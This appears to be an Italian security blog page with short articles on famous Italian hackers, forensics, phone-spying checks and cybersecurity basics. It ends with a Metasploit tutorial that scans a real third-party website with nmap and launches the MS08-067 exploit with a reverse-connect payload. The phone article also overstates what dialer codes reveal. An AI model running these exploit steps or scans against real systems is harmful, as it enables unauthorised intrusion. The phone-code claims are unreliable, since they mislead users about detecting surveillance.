HackerSecret.it - Il Sito Italiano Più Autorevole sul Mondo dell'Hacking, del Penetration Testing e della CyberSecurity

  • Home
  • Scarica l’App gratuita
  • Visita il Nostro Shop
  • Contattaci per info
VISITA IL NOSTRO SHOP ! CLICCA QUI !

I più famosi hacker italiani

  • 0
Lo Staff di HackerSecret.it
giovedì, 22 Aprile 2021 / Pubblicato il Guide, Hacker

Chi sono i più famosi hacker italiani? In questo articolo parliamo di questo.

Raoul “Nobody” Chiesa nasce a Torino il 3 Luglio del 1973. È stato tra i primi hacker italiani negli anni ’80 e ’90 (1986-1995).

Nel 1997 ha fondato la sua prima azienda di Security Advisoring, divenuta in 15 anni una realtà primaria nel panorama italiano, l’unica azienda vendor-neutral e non sovvenzionata da fondi di investimento o venture capital; Chiesa lascia la società nel 2012 in seguito ad una serie di contrasti sulla visione, la strategia, la gestione e forti attriti con il socio.

Nel 2012, insieme ad altri professionisti del mondo InfoSec, italiano ed internazionale, fondò “The Security Brokers“, un’azienda di Cybersecurity visionaria che offre soluzioni e servizi di consulenza in materia di sicurezza informatica, a Governi, LEA, Pubblica Amministrazione e aziende private.

Chiesa è tra i membri fondatori di CLUSIT (Associazione italiana per la sicurezza delle informazioni, costituita nel 2000), inoltre è membro del Board of Directors di ISECOM, OWASP Italian Chapter; è stato uno dei tre coordinatori ufficiali del gruppo di lavoro “Cyber ​​World” presso il Centro Alti Studi per la Difesa (CASD) tra il 2010 e il 2014 presso l’Osservatorio nazionale di sicurezza (OSN) sotto la supervisione del Centro militare per gli studi strategici {CeMiSS).

Chi sia precisamente Fabio Ghioni non si sa: in Telecom, ai tempi di Tavaroli e dello scandalo dei dossier, era il capo carismatico del Tiger Team, ovvero del gruppo di miliziani del computer incaricati di difendere i nostri confini digitali dagli attacchi degli hacker, dei servizi segreti stranieri, del terrorismo informatico e dello spionaggio industriale. Poi è stato accusato lui di pirateria e di spionaggio d’alto bordo, fino a essere sbattuto in galera (San Vittore) in isolamento assoluto. Ne è uscito in seguito con l’ambigua fama di essere uno dei migliori/peggiori hacker del pianeta, cosa che gli ha guadagnato l’assoluto rispetto di schiere di adoranti “wannabe”, dalla Thailandia alla California. Ne hanno fatto addirittura un eroe a fumetti con il nickname di Hero-Z con gli stessi suoi occhialini a spigolo vivo. Intanto Ghioni diventava scrittore, filosofo esoterico, Maestro Yogi e inventore di curiosi aggeggi, sempre più piccoli, che agganciati a internet riescono a fare quasi ogni cosa. Uno strano tipo di guru che vive dentro un Avatar digitale e abita in Cyberworld, nel mondo fanta-digitale dei romanzi di Stieg Larsson. 

Luigi Auriemma e Donato Ferrante sono due fra gli hacker più gettonati del momento, negli ambienti governativi e industriali di tutto il mondo. Sabato scorso un lungo articolo pubblicato sul New York Times ha svelato come il mercato delle consulenze informatiche, legate a falle, cyber-attacchi e difesa, sia diventato un business come altri.

20/30 anni fa l’hacker svelava bug o altre magagne senza farsi pagare. Ne faceva una questione di ego: magari voleva essere il migliore, oppure dimostrare alle grandi aziende quello che poteva fare un ragazzetto. In ogni caso raramente si trattava di una questione di soldi. Al massimo a distanza di tempo il giovane accettava qualche proposta di assunzione, a volte anche dopo aver assaggiato un po’ di galera. Oggi è tutto diverso. Anche questo è diventato un business.

Cos’è l’informatica forense?

  • 0
Lo Staff di HackerSecret.it
mercoledì, 21 Aprile 2021 / Pubblicato il Guide, Hacker

Cos’è l’informatica forense? In questo articolo approfondiamo tale concetto.

L’informatica forense è una branca della scienza digitale forense legata alle prove acquisite da computer e altri dispositivi di memorizzazione digitale. Il suo scopo è quello di esaminare dispositivi digitali seguendo processi di analisi forense al fine di identificare, preservare, recuperare, analizzare e presentare fatti o opinioni riguardanti le informazioni raccolte.

Questo fa sì che si faccia largo uso di tale scienza nelle indagini riguardanti una varietà di crimini informatici nei quali le prove raccolte, soggette alle stesse pratiche e linee guida di ogni altra prova digitale, saranno usate in ambito di processo. A tal scopo sono utilizzate tecniche e principi legati al recupero dei dati, affiancati però da procedure designate alla creazione di un percorso di revisione e analisi che sia legale.

Il suo utilizzo in casi di alto profilo ha fatto sì che l’informatica forense acquistasse notorietà e venga sempre più accettata come scienza affidabile tra le il sistema delle corti.

Benché non esista una definizione univoca di informatica forense, gli esperti sono largamente concordi su quali siano gli scopi fondamentali di un’indagine forense digitale: la raccolta e l’analisi delle prove digitali al fine di risolvere casi di criminalità di diverso tipo. Per tanto, un’indagine di informatica forense prevede una fase preliminare di ricerca dei dati durante la quale le informazioni più rilevanti vengono raccolte, identificate ed etichettate; segue una fase in cui vengono esaminate, sia attraverso processi automatizzati sia manualmente (questo passaggio rappresenta il momento forse più delicato, dal momento che chi svolge le analisi deve assicurarsi di preservarne l’integrità).

La fase di analisi, invece, consiste nel confrontare i dati raccolti ed i risultati ottenuti con le richieste poste da chi ha commissionato le indagini; in genere, specie se le operazioni forensi sono finalizzate all’utilizzo in ambito processuale, è prevista anche la presentazione degli esiti delle indagini e non solo: è possibile, infatti, che vengano descritte le tecniche e gli strumenti utilizzati, così come i processi necessari ad un eventuale proseguimento o completamento delle indagini stesse.

L’entrata in vigore della legge n° 48 del 18 marzo 2008 ha di fatto sancito l’introduzione dei principi fondanti della computer forensics all’interno del nostro ordinamento, prevedendo importanti aspetti legati alla gestione delle digital evidence che, per loro natura, presentano caratteristiche di estrema volatilità e fragilità.

Seppur il legislatore si sia mosso cautamente nell’introdurre i nuovi principi per l’assunzione delle prove informatiche, non indicando cioè nel dettaglio le modalità esecutorie da applicare nell’utilizzo di tali istituti, si è comunque focalizzata l’attenzione su due basilari aspetti, sicuramente più vincolati al risultato finale che non al metodo da utilizzare, ovvero la corretta procedura di copia dei dati utili alle indagini e la loro integrità e non alterabilità in sede di acquisizione.

Come capire se ti spiano il cellulare?

  • 0
Lo Staff di HackerSecret.it
martedì, 20 Aprile 2021 / Pubblicato il Guide, Hacker

Come capire se ti spiano il cellulare? In questo articolo lo vediamo.

In questa guida vi mostreremo come controllare se il nostro telefono è intercettato o se qualcuno spia i nostri account, utilizzando gli strumenti forniti dalle app social, chat e dal sistema operativo stesso.

La prima verifica da fare riguarda gli accessi sui social network, così da poter controllare le sessioni attive e verificare se sono presenti accessi da zone che non frequentiamo o con IP completamente sconosciuto.

Anche le app di messaggistica istantanea come WhatsApp, Telegram e Facebook Messenger possono essere messe sotto controllo, meglio quindi effettuare subito tutti i passaggi descritti qui in basso.

Da WhatsApp possiamo essere spiati solo se associati a WhatsApp Web, anche se viene mostrata sempre una notifica sul telefono. Per controllare gli accessi al servizio apriamo l’app, pigiamo in alto a destra sul menu con i tre puntini (o in basso a destra sugli iPhone), premiamo su WhatsApp Web e premendo infine su Disconnetti da tutti i dispositivi.

Puoi anche scoprire se qualcuno sta intercettando le tue comunicazioni utilizzando dei semplici codici.

Il primo codice da utilizzare per capire se qualcuno ha attivato la deviazione sulle chiamate e sugli SMS ricevuti è il *#21#. Sullo schermo appariranno alcune informazioni riguardanti le deviazioni attive sullo smartphone: nel caso in cui qualcuno abbia manomesso il device, grazie a questo codice si potrà risalire alla sua identità. Si potrà scoprire che in realtà è opera del proprio ragazzo o della propria ragazza. Un consiglio per gli anziani: non prestate il vostro telefono a degli sconosciuti. Potrebbero attivare la deviazione e ottenere facilmente informazioni su dove vivete e sulle vostre abitudini quotidiane.

Grazie al codice *#62# si scoprirà chi sta cercando di deviare le vostre chiamate per spiare lo smartphone. Una volta scoperto il numero di telefono, si potrà andare direttamente alla Polizia ed effettuare la denuncia.

Grazie a un codice speciale è possibile scoprire se qualcuno sta utilizzando il nostro smartphone Android. Digitando il numero *#*#4636#*#* si accederà a una sezione del device che permetterà di scoprire le Statistiche di Utilizzo. All’interno di questa sezione sono registrati tutti i dati di utilizzo dello smartphone: il programma utilizzato, il giorno di utilizzo e il tempo. Se notiamo qualche dato strano, vorrà dire che qualcuno sta spiando il nostro smartphone.

Il concetto di sicurezza informatica

  • 0
Lo Staff di HackerSecret.it
lunedì, 19 Aprile 2021 / Pubblicato il Guide, Hacker

Come può essere definito il concetto di sicurezza informatica? In questo articolo approfondiamo tale concetto.

Chiedendo ai comuni utenti di internet che cosa pensano sia la sicurezza informatica si ricevono le risposte più varie. Alcune di queste sono:

è il sistema che impedisce alle persone di vedere i miei dati, come le mail; un esempio può essere l’inserimento della password;

è il sistema che impedisce di prendere i virus quando si naviga in internet;

è il sistema che protegge il mio computer dai virus.

Ciò che emerge è quindi che questi utenti pensano che la sicurezza informatica sia il sistema di protezione dei propri dati; ciò che però non sanno spiegare è come possa essere costituito questo “sistema”. Alcuni dicono:

“è il sistema che mi chiede la password!”

Quanto spiegano gli utenti non è sbagliato, ma in realtà la definizione di sicurezza informatica è molto più ampia:

La sicurezza informatica è l’insieme delle misure di carattere tecnologico, organizzativo e procedurale volte a garantire la protezione dei sistemi informatici e dei dati in essi contenuti, nonché l’autenticazione dell’utente, la disponibilità, l’integrità e la riservatezza delle informazioni e dei servizi, gestiti o erogati in modo digitale al fine della prevenzione di potenziali rischi e/o violazioni.

In sostanza possiamo dire che la sicurezza informatica è quella branca dell’informatica che studia e individua le tecniche e le metodologie per rendere le tecnologie ICT sempre più sicure.

Metasploit tutorial in italiano

  • 0
Lo Staff di HackerSecret.it
domenica, 18 Aprile 2021 / Pubblicato il Guide, Hacker

Tutorial in italiano per Metasploit? In questo articolo approfondiamo tale tematica.

Metasploit Framework è uno strumento il cui scopo è quello di permettere ad un tester di scrivere velocemente exploit e di automatizzarne l’esecuzione. All’interno del tool sono disponibili una libreria di exploit per le più comuni (e non) vulnerabilità, un’archivio di payloads e strumenti di utilità pronti all’uso.

La grande diffusione di questo strumento ha fatto si che, ad oggi, molte advisories vengano accompagnate da moduli pronti per essere testati su Metasploit.

Installazione Metasploit
Metasploit è installabile su qualsiasi piattaforma purché sia disponibile l’interpete Ruby (linguaggio in cui è scritto il tool). Esistono pacchetti pronti per le varie piattafome che è possibile reperire sul sito ufficiale.

Per i meno pazienti è possibile utilizzare una macchina virtuale con Backtrack che include una installazione di Metasploit di default. In questo caso sarebbe opportuno aggiornare il framework all’ultima versione, da terminale:

$ msfupdate
O alternativamente fare l’aggiornamento direttamente via svn:

$ cd cartella-di-installazione-di-metasploit
$ svn up
Console Metasploit
È possibile lanciare Metasploit da console o da interfaccia grafica.

Per lanciare la console basta utilizzare da una shell il comando (si presume di essere in ambiente linux):

$ msfconsole
Altrimenti per l’interfaccia grafica:

$ msfgui
In generale è più complicato, almeno all’inizio, gestire uno strumento da linea di comando piuttosto che da una interfaccia grafica. Per Metasploit vale la stessa regola ma vi invito comunque ad utilizzare la console perché permette un controllo più capillare e completo sullo strumento – dopo aver imparato i comandi base potrete comunque passare liberamente ad utilizzare una gui con uno sforzo nullo.

Lanciamo dunque la console:

$ msfconsole
Se la console viene lanciata senza errori, dopo una serie di messaggi di benvenuto, dovremmo trovarci di fronte ad un prompt come questo:

msf >
La prima cosa da sapere è come invocare l’help che ci fornirà una lista dei comandi disponibili:

msf > help
Comandi Metasploit
Vediamo adesso alcuni dei comandi più utili, il primo dei quali è sicuramente connect che permette di connetterci ad un host remoto (similmente a netcat o telnet):

msf > connect www.html.it 80
[*] Connected to www.html.it:80
Esistono poi comandi come ping e nmap che non hanno bisogno di grandi presentazioni:

msf > ping www.html.it
[*] exec: ping www.html.it
PING www.html.it (151.1.244.200): 56 data bytes
64 bytes from 151.1.244.200: icmp_seq=0 ttl=56 time=54.674 ms
64 bytes from 151.1.244.200: icmp_seq=1 ttl=56 time=47.335 ms
64 bytes from 151.1.244.200: icmp_seq=2 ttl=56 time=47.044 ms

msf > nmap -T5 -A www.html.it
[*] exec: nmap -T5 -A www.html.it
Starting Nmap 5.51 ( http://nmap.org ) at 2012-05-20 18:31 CEST
Nmap scan report for www.html.it (151.1.244.200)
Host is up (0.050s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.20 ((Ubuntu))
| http-robots.txt: 3 disallowed entries
|_/articoli/stampa/ / /ads_pages/
|_http-title: HTML.it
|_http-favicon:
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
443/tcp closed https
1863/tcp open msnp?
5190/tcp open aol?
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.40 seconds
E l’utilisismo irb che ci mette a disposizione un interpreet interattivo Ruby per scrivere script al volo:

msf > irb
[*] Starting IRB shell…

/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/universal-darwin10.0/readline.bundle: warning: already initialized constant HISTORY
/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/universal-darwin10.0/readline.bundle: warning: already initialized constant FILENAME_COMPLETION_PROC
/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/universal-darwin10.0/readline.bundle: warning: already initialized constant USERNAME_COMPLETION_PROC
/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/universal-darwin10.0/readline.bundle: warning: already initialized constant VERSION
>>
In generale per avere più informazioni sull’utilizzo di qualsiasi comando basta invocare l’help dedicato:

msf > nomecomando -h
Vediamo adesso i comandi per interagire con le librerie di exploit e payload. Il primo da conoscere è show che serve per mostrare il contenuto delle librerie, ad esempio:

msf > show exploits
Con questo comando verrà stampata la lista di tutti gli exploit presenti.

Per visualizzare i payload similmente useremo:

msf > show payloads
Per cercare un elemento specifico possiamo servirci del comando search:

msf > search cve:2009 type:exploit app:client
Search utilizza keyword (type, app, platform, name, etc) per affinare la ricerca. Al solito è buona norma consultare l’help del comando per avere un’idea di tutte le sue funzionalità:

msf > search -h

Una volta presa confidenza con la console possiamo provare ad utilizzare un exploit tra quelli presenti.

Il comando per selezionare l’exploit da lanciare è use, in questo modo:

msf > use exploit/windows/smb/ms08_067_metapi
Il comando supporta l’auto completamento (tasto TAB) per aiutarci a navigare nella directory dei vari moduli presenti esattamente come una shell. Una volta selezionato un exploit e premuto invio il prompt cambia:

msf exploit(ms08_067_netapi) >
Per prima cosa dobbiamo farci un’idea di quali parametri servono all’exploit per essere eseguito, quindi utilizzeremo il comando show options:

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/vncinject/reverse_tcp_dns):

Name Current Setting Required Description
—- ————— ——– ———–
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC thread yes Exit technique: seh, thread, none, process
LHOST yes The DNS hostname to connect back to
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy

Exploit target:

Id Name
— —-
0 Automatic Targeting
Per informazioni dettagliate sull’exploit c’è il comando info.

Per settare i parametri richiesti si utilizza il comando set (e unset per ripristinare), ad esempio per settare il valore del parametro RHOST (remote host):

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100
Se l’exploit lo permette possiamo settare un payload da utilizzare per l’attacco:

msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns
Una volta inizializzati tutti i parametri possiamo verificare che il bersaglio sia effettivamente vulnerabile al nostro exploit utilizzando il comando check:

msf exploit(ms08_067_netapi) > check
E infine possiamo lanciare l’exploit con il comando exploit:

msf exploit(ms08_067_netapi) > exploit

  • 1
  • 2
  • 3

Cerca nel Sito

Clicca subito qui per visitare il nostro Shop!

Clicca subito qui per visitare il nostro Shop!

Altri 2300 utenti come te lo hanno già fatto quest'anno!

Gli ultimi articoli

  • I più famosi hacker italiani

  • Cos’è l’informatica forense?

  • Come capire se ti spiano il cellulare?

  • Il concetto di sicurezza informatica

  • Metasploit tutorial in italiano

Tutte le tecniche, i prodotti e i servizi descritti o contenuti in questo sito si intendono per uso esclusivo di studio e di aggiornamento professionale e per testare la sicurezza della propria rete informatica in accordo alle vigenti normative sull'accesso a sistemi informativi e telematici (cfr. art. 615 ter c.p. e successive modifiche).

TORNA SU
WeCreativez WhatsApp Support
Possiamo supportarti per ogni tua esigenza. Contattaci subito specificando il supporto, prodotto o servizio che ti serve!
Ciao, come possiamo aiutarti?
Ciao, come possiamo aiutarti?